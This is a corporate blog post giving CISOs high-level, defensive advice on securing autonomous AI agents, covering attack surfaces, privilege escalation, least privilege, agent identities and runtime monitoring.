25/03/2026 14 minutos de leituraPor Rafael

SHARE:

Cybersecurity has never been a static field, but what’s happening right now with AI agents is unlike anything we’ve seen before.

For decades, protecting digital systems basically meant building walls, monitoring entry points, and responding to known threats. It worked — not perfectly, but it worked. Now, the rules of the game have shifted pretty dramatically. 🎯

AI agents have left the research labs and moved straight into the heart of corporate operations. We’re not talking about chatbots that answer questions or assistants that summarize emails. We’re talking about autonomous systems that execute complex tasks, make decisions, access databases, modify code, send communications, and chain together entire workflows — all without human intervention at every step.

Microsoft, Google, Anthropic, OpenAI, and Salesforce are already deploying agentic AI systems that operate across applications and data, well beyond simple chat interfaces. Gartner projects that 40% of enterprise applications will incorporate task-specific AI agents by 2026, up from less than 5% in 2025. That’s rocket-speed adoption. 🚀

The problem is that threats are growing just as fast, and defense mechanisms clearly aren’t keeping up. Vulnerabilities in the Model Context Protocol (MCP), prompt injection attacks, data exfiltration through AI assistants — the attack surface is expanding faster than the defenses designed to protect it. This imbalance between the speed of adoption and the speed of threats is exactly what puts AI agent security at the center of today’s most urgent technology conversations.

The risks stopped being theoretical a long time ago. In a controlled red-team exercise, McKinsey’s internal AI platform, called Lilli, was compromised by an autonomous agent that gained broad system access in under two hours. Two hours. That’s a brutal demonstration of how agentic threats can outpace human response times without breaking a sweat.

A Dark Reading survey found that 48% of cybersecurity professionals now identify agentic AI and autonomous systems as the most dangerous attack vector out there. And the financial impact matches: according to IBM’s 2025 Cost of a Data Breach report, breaches caused by shadow AI cost an average of $4.63 million per incident — roughly $670,000 more than a standard breach. The exposure isn’t just bigger; it’s structurally different. Agentic attacks cut across systems, exfiltrate data, and escalate privileges at machine speed — before a human analyst can even open a ticket.

Why AI agents create an entirely new attack surface

To understand the scale of the challenge, you need to look closely at what makes these agents fundamentally different from any software that came before them. A modern AI agent doesn’t just respond to commands. It interprets context, infers intent, plans sequences of actions, and executes those actions in a chained fashion across real environments. That means it needs access to resources, permissions, and data that no traditional software has ever concentrated in a single point. That concentration of power, by itself, is already an invitation for serious cybersecurity problems.

As Barak Turovsky, Operating Advisor at Bessemer Venture Partners and former Chief AI Officer at General Motors, points out: AI agents aren’t just another application surface. They’re autonomous actors with high privileges, capable of reasoning, acting, and chaining workflows across systems. The core risk isn’t the vulnerability itself — it’s the unbounded capability these agents can accumulate.

What makes the situation even more delicate is that agents frequently operate in multi-agent pipelines, where one agent orchestrates others, passing instructions, data, and context between them. When you have a chain of agents working together, every handoff point between them is a potential vulnerability. A malicious instruction injected at the beginning of the chain can propagate and amplify throughout the entire sequence, causing far more damage than any isolated attack could.

This challenge is amplified by a unique property of agents: their behavior is non-deterministic. As Jason Chan, cybersecurity leader and Operating Advisor at Bessemer, explains, much of the power that agents offer comes from the ability to specify an outcome without documenting every step needed to achieve it in detail. If we’ve learned anything from rule-based security, it’s that it can and will be subverted. Traditional controls assume predictable execution. Agents don’t offer that — and that’s why the industry needs approaches built specifically for this context, not just adaptations of what already existed.

On top of that, AI agents interact with the outside world in ways that dramatically expand the attack surface. They browse the web, consume third-party APIs, process user-submitted documents, and execute code in real time. Each of these interactions is an open door for what the security community has started calling agentic threats. Prompt injection, context poisoning, and tool manipulation are just a few examples of how attackers are already exploiting these gaps in practice.

As the latest OWASP analysis points out, AI agents actually amplify existing vulnerabilities more than they introduce entirely new ones. The threat categories are familiar: credential theft, privilege escalation, data exfiltration. What’s changed is the blast radius and the speed. Dean Sysman, co-founder of Axonius and Venture Advisor at Bessemer, adds: an agent doesn’t have the same human understanding of what’s wrong to do. When given a goal or optimization function, the agent will do harmful or dangerous things that are obviously wrong to us humans.

The four layers of the agentic attack surface

While no two companies face exactly the same exposure, the attack surface of an agentic environment consistently maps to four layers:

  • The endpoint, where coding agents like Cursor and GitHub Copilot operate directly in the developer’s environment
  • The API and MCP gateway, where agents call tools and exchange instructions with each other
  • SaaS platforms, where agents are embedded in core business workflows like Salesforce and Microsoft 365
  • The identity layer, where credentials and access privileges are granted, accumulated, and — all too often — left unreviewed

Understanding which of these layers carries the most risk in your specific environment is the best starting point for any agent security strategy.

Privilege escalation: the risk that worries experts the most

Of all the threats emerging with the mass adoption of AI agents, privilege escalation is the one keeping security experts up at night. The concept itself isn’t new. Attackers trying to gain more permissions than they should have is a classic in cybersecurity history. What’s changed is the context and the scale. An AI agent that starts with limited permissions can, through a sequence of seemingly legitimate actions, end up accessing systems, data, and capabilities far beyond what was originally authorized. And the worst part is that this process can happen completely invisibly to security teams.

Mike Gozzo, Chief Product and Technology Officer at Ada, hits the nail on the head: AI agents aren’t tools — they’re actors. They make decisions, execute actions, and interact with systems on behalf of your customers. Securing an actor is a fundamentally different problem from securing a tool, and most of the industry hasn’t absorbed that difference yet.

The problem gets worse when you consider that many agents are deployed following the principle of convenience rather than the principle of least privilege. To get the agent running smoothly and without friction, development teams often grant broad permissions from the start, figuring they’ll tighten things up later. Spoiler: they rarely do. 😅 This pattern creates an environment where a compromised or poorly instructed agent has immediate access to critical resources, turning a small vulnerability into a security incident of catastrophic proportions.

The solution isn’t simple, but there’s a clear path forward. Organizations taking AI agent security seriously are implementing granular access control policies specific to agents, reviewing permissions at regular intervals, and auditing agent action logs with the same rigor they apply to critical systems. Beyond that, they’re starting to treat each agent as an independent digital identity, with its own credentials, a well-defined scope of action, and rapid revocation mechanisms for when something goes off the rails.

A three-stage framework for securing AI agents

Securing AI agents is a systemic problem. Before a CISO can apply policies or respond to threats, they need to know what they’re dealing with. And before agents can be protected at runtime, they need to have been configured correctly. The challenge breaks down into three stages, each one a prerequisite for the next.

Stage 1: Visibility — know what you have

Visibility is the first stage and often the most neglected. Most companies don’t have an accurate inventory of the AI agents operating in their environment: which agents exist, what permissions they hold, who authorized them, and what they were built for. Without this foundation, everything that follows is guesswork.

Visibility means establishing a real-time map of agents across your entire infrastructure. This includes coding agents like Cursor and GitHub Copilot at the endpoint, orchestration agents embedded in SaaS platforms, and API-connected agents operating through MCP servers and third-party integrations. Intent matters here too. An agent provisioned for a narrow task but with broad access to a CRM, for example, is a misconfiguration waiting to become an incident.

Stage 2: Configuration — reduce the blast radius before an attack happens

With the inventory established, the next question is: are these agents configured securely? This is where most of today’s exploitable risk lives. The most common misconfigurations follow a predictable pattern: excessive privilege, weak or shared credentials, policy violations that went unnoticed because no tool was looking for them, and abnormal access patterns that don’t trigger traditional alerts because they’re technically within policy.

Configuration isn’t a one-time audit. It’s a continuous posture. An agent’s attack surface changes every time it’s updated, given a new tool, or connected to a new service. CISOs need solutions that monitor configuration drift in real time — not in quarterly reviews.

Stage 3: Runtime protection — detect and respond at machine speed

The final stage is where the agentic threat becomes qualitatively different from everything that came before. A compromised agent doesn’t wait. It reasons, pivots, and escalates access autonomously — often completing an entire attack chain in the time it takes a human analyst to open a ticket.

Runtime protection requires three capabilities that traditional security tools weren’t built to deliver: agentic investigation, which means understanding what the agent did and why; real-time detection that interprets non-deterministic behavior instead of looking for known signatures; and contextual enforcement that can halt a specific action without taking down the entire workflow.

That last capability — targeted intervention during execution — is where the market is most underdeveloped and where the clearest opportunity for innovation in security infrastructure exists. 🔐

Seven questions every CISO should be asking right now

Every team, regardless of size, needs to develop a tailored defensive strategy for protecting AI agents. Here are seven questions that can guide an internal audit and help map where the biggest gaps are:

  • Scope and pain: How extensively are AI agents deployed in your environment today?
  • What’s your biggest concern regarding the security risks of these agents?
  • Are you more worried about coding agents like Cursor and Claude, or general-purpose agents?
  • Architecture: Which layer makes the most sense for agent security controls — endpoint, network/proxy, or identity management?
  • Is there room for purpose-built solutions designed exclusively for agents?
  • Market noise: With so many AI agent security startups popping up, how do you tell them apart?
  • Detection and prevention: Are you more focused on gaining visibility into agent usage or on preventing AI agents from being compromised?

Five priority actions for CISOs in 2026

The threat is real, the tools are still nascent, and the window to get ahead is closing. Five priorities stand out for CISOs navigating the challenge of agentic security this year.

1. Align the organization’s risk posture before buying anything

The instinct under pressure is to start buying. Resist. Before evaluating vendors or deploying controls, security teams need clarity on where the organization actually stands on AI agents. As Jason Chan puts it: define, at the business level, your organization’s position on agents. Are you going all in? Testing cautiously? Saying no until things get clearer? That position will help security teams align their approach with the organization’s expectations and risk tolerance. A CISO in aggressive deployment mode needs a fundamentally different security posture than one in observation mode.

2. Treat agents as production infrastructure, not as applications

The most common mistake is applying the existing application security playbook to agents. It doesn’t work. As Barak Turovsky observes, most companies are layering monitoring on top of poorly constrained agents — which is the wrong order. The right order is: ownership first, then constraints, then monitoring. Define who’s responsible for each agent, limit its permissions to what the task requires, and implement guardrails at the action level before any monitoring tool gets turned on. Organizations that get this right won’t just be more secure — they’ll deploy agents faster, because they actually trust them.

3. Start narrow and expand deliberately

Agents accumulate access over time, and the risk surface grows with it. Dean Sysman offers a clear prescription: have a gradual, well-defined plan for the inputs and outputs available to each agent, make sure they’re very narrowly scoped, and expand incrementally. Launch agents with the minimum permissions needed for a specific task, validate their behavior in that constrained environment, and expand access only when there’s clear evidence it’s necessary and safe. Granting broad access upfront in the name of flexibility or speed is precisely how organizations create the privilege accumulation problem that attackers will exploit.

4. Close the gap between freedom and control with guardrails, not just monitoring

The fundamental tension in agentic AI is that the same autonomy that makes agents powerful is what makes them dangerous. As Dean notes, the great value of agents is the ability to decide to do things on their own, but the guardrails around what they shouldn’t do need to be incredibly comprehensive. Monitoring can tell you what an agent did. Guardrails determine what it’s allowed to do in the first place. The security leaders who get this right will be the ones who define those boundaries explicitly — at the action level, not just the access level — before an incident forces the conversation.

5. Give every agent an identity and treat it like an employee

Most agents today inherit broad permissions from the systems they connect to, with no zero-trust boundary governing what they can actually reach. Mike Gozzo offers a precise diagnosis: give agents an identity, define the scope of access, and audit what they do the same way you would for any other actor in your environment. A CISO’s first move should be ensuring every agent has a managed identity with scoped authentication — not a shared API key with unrestricted access. If you can’t answer the questions — what can this agent do, on whose behalf, and who approved it — the same way you’d answer them about a human employee, you’re not ready for the autonomy these systems are about to have. 👁️

What companies need to internalize right now

The conversation around AI agent security is still overly theoretical in most organizations — which is a serious problem considering 2026 is already happening. The pressure to adopt AI agents is real and will keep growing, because the productivity and automation benefits are genuinely significant. Ignoring the cybersecurity risks associated with this adoption isn’t a responsible option, but freezing up out of fear doesn’t help anyone either.

The path forward lies in building security practices that keep pace with adoption. That starts with including security teams in conversations about agents from the beginning — not after the system is already in production. Integrating security into the agent development lifecycle is critical to preventing structural vulnerabilities from being baked in at the design stage. Clearly defining each agent’s scope of action, mapping every resource it will access, and establishing explicit access control policies before the first line of code is written are steps that make an enormous difference.

Investing in visibility remains one of the highest-impact actions you can take. One of the biggest problems with agentic threats is that they often fly under the radar because organizations simply don’t have adequate tools to see what agents are doing in detail. Implementing detailed logging of agent actions, creating dedicated monitoring dashboards, and establishing behavioral baselines might sound like straightforward steps, but they’re the difference between detecting an incident in minutes and finding out weeks later.

Agentic AI isn’t coming. It’s already here. But the security infrastructure to match it isn’t — not yet. The CISOs who close that gap deliberately, starting now, will define how enterprise AI works for the rest of the decade. Those who wait until 2027 will spend that time responding to incidents. The security landscape for AI agents in 2026 will be shaped by the decisions organizations make today. Those who treat AI agent security as a strategic priority now will be far better positioned to capture the technology’s benefits without paying the price of a catastrophic breach.

Picture of Rafael

Rafael

Operations

I transform internal processes into delivery machines — ensuring that every Viral Method client receives premium service and real results.

Fill out the form and our team will contact you within 24 hours.

Related publications

AI SDR Agent on WhatsApp: How SMBs Can Cut Costs and Scale Sales

Respond 21x faster your leads and scale your sales operation with a fraction of the cost of expanding your sales

Robot Detects Unusual Browser Activity Using JavaScript and Cookies

Learn why sites require JavaScript and cookies for unusual activity and how to fix blocks with quick, simple steps

Productivity with Agentic Artificial Intelligence in execution and workflows.

Agentic AI: how to operationalize AI agents to improve workflows, metrics, and governance, turning pilots into real productivity gains.

Receive the best innovation content in your email.

All the news, tips, trends, and resources you're looking for, delivered to your inbox.

By subscribing to the newsletter, you agree to receive communications from Método Viral. We are committed to always protecting and respecting your privacy.

Rafael

Online

Atendimento

Calculadora Preço de Sites

Descubra quanto custa o site ideal para seu negócio

Páginas do Site

Quantas páginas você precisa?

4

Arraste para selecionar de 1 a 20 páginas

📄

⚡ Em apenas 2 minutos, descubra automaticamente quanto custa um site em 2026 sob medida para o seu negócio

👥 Mais de 0+ empresas já calcularam seu orçamento

Fale com um consultor

Preencha o formulário e nossa equipe entrará em contato.